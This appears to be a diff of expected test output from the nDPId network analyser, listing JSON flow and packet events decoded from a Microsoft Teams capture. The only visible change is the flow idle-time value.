+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2020,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1587041685996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685996,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyNAbtKVk3cy6oDyVAQIACBQQAA"} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686239,"flow_last_seen":1587041686239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686239,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1587041686239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyPAbtgh2e9AAAAALAC\/\/9PlwAAAgQFtAEDAwUBAQgKMIS9EAAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1587041686288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686288,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8YwZAAGwGaHQ0ck0hwKgBBgG77I9T9FE0YIdnvqASIADemAAAAgQFoAEDAwgEAggKYR9buzCEvRA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041686611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041686589,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1587041686659,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1587041686659,"pkt":"\/\/\/\/\/\/\/\/jP5XIzfkCABFAABE9p0AAEAR\/0vAqAFwwKgB\/+EV4RUAME6OU3BvdFVkcDBE2bWZ25IvowABAADKIN8ICP0NzlEBuCwq6R7jWIhweQ=="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686889,"flow_last_seen":1587041686889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686889,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1587041686889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686889,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR0nAqAEGKH4JQ+yQAbuMpd1iAAAAALAC\/\/\/7KQAAAgQFtAEDAwUBAQgKMIS\/iwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1587041686918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686918,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PdhAAGwG3XQofglDwKgBBgG77JCDb8\/fjKXdY6ASIAC\/qwAAAgQFoAEDAwgEAggKUkSG7zCEv4s="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1587041686918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686918,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR1XAqAEGKH4JQ+yQAbuMpd1jg2\/P4IAQEAn+PwAAAQEICjCEv6dSRIbv"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687245,"flow_last_seen":1587041687245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687245,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1587041687245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687245,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyRAbt4yq\/kAAAAALAC\/\/\/rWgAAAgQFtAEDAwUBAQgKMITA4AAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2193,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1587041687293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687293,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8EaVAAGwGudU0ck0hwKgBBgG77JHMBk4keMqv5aASIADnTgAAAgQFoAEDAwgEAggKYPR58TCEwOA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2194,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1587041687293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687293,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyRAbt4yq\/lzAZOJYAQEAkl0AAAAQEICjCEwQ9g9Hnx"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686889,"flow_last_seen":1587041686889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686889,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1587041686889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686889,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR0nAqAEGKH4JQ+yQAbuMpd1iAAAAALAC\/\/\/7KQAAAgQFtAEDAwUBAQgKMIS\/iwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1587041686918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686918,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PdhAAGwG3XQofglDwKgBBgG77JCDb8\/fjKXdY6ASIAC\/qwAAAgQFoAEDAwgEAggKUkSG7zCEv4s="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1587041686918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686918,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR1XAqAEGKH4JQ+yQAbuMpd1jg2\/P4IAQEAn+PwAAAQEICjCEv6dSRIbv"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687245,"flow_last_seen":1587041687245,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687245,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1587041687245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687245,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyRAbt4yq\/kAAAAALAC\/\/\/rWgAAAgQFtAEDAwUBAQgKMITA4AAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2193,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1587041687293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687293,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8EaVAAGwGudU0ck0hwKgBBgG77JHMBk4keMqv5aASIADnTgAAAgQFoAEDAwgEAggKYPR58TCEwOA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2194,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1587041687293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687293,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyRAbt4yq\/lzAZOJYAQEAkl0AAAAQEICjCEwQ9g9Hnx"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1587041687370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041687370,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF06EAAP8RZK7AqAEGwKgBAdM1ADUAMUK+cAQBAAABAAAAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAE="} 